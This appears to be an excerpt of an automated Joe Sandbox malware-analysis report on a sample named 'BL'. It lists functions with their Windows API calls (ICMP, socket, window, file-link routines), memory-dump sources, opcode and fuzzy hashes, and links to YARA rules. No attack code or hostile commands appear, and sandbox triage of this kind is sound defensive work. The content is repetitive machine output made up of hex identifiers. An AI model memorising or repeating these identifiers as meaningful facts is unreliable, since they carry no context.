                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                            • API String ID: 2574300362-58917771
                                                                                                                            • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                            • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                            • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                            • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                            Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                            • API String ID: 2574300362-3530519716
                                                                                                                            • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                            • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                            • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                            • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                            Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                            • API String ID: 2574300362-275556492
                                                                                                                            • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                            • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                            • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                            • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                            Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                            • API String ID: 2574300362-3024904723
                                                                                                                            • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                            • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                                                            • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                            • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                                            Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 5dec897235398ff8dfc9b84a085f09b9ede9ebe49b8b673fdf707749075dc249
                                                                                                                            • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                            • Opcode Fuzzy Hash: 5dec897235398ff8dfc9b84a085f09b9ede9ebe49b8b673fdf707749075dc249
                                                                                                                            • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                            Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __flush.LIBCMT ref: 00414630
                                                                                                                            • __fileno.LIBCMT ref: 00414650
                                                                                                                            • __locking.LIBCMT ref: 00414657
                                                                                                                            • __flsbuf.LIBCMT ref: 00414682
                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3240763771-0
                                                                                                                            • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                            • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                            • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                            • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                            Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                            • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                            • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2286883814-0
                                                                                                                            • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                            • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                            • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                            • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                            Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                            • #21.WSOCK32 ref: 004740E0
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1881357543-0
                                                                                                                            • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                            • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                            • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                            • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                            Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352109105-0
                                                                                                                            • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                            • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                            • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                            • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                            Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                            • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                            • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                            • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                            Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                            • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3321077145-0
                                                                                                                            • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                            • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                            • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                            • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                            Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 004505BF
                                                                                                                            • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                            • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Proc$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2351499541-0
                                                                                                                            • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                            • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                            • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                            • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                            Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                            • __itow.LIBCMT ref: 00461461
                                                                                                                            • __itow.LIBCMT ref: 004614AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$__itow$_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2875217250-0
                                                                                                                            • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                            • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                            • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                            • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                            Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                              • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                              • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                              • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                            • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                            • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2759813231-0
                                                                                                                            • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                            • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                            • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                            • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                            Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2169480361-0
                                                                                                                            • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                            • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                            • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
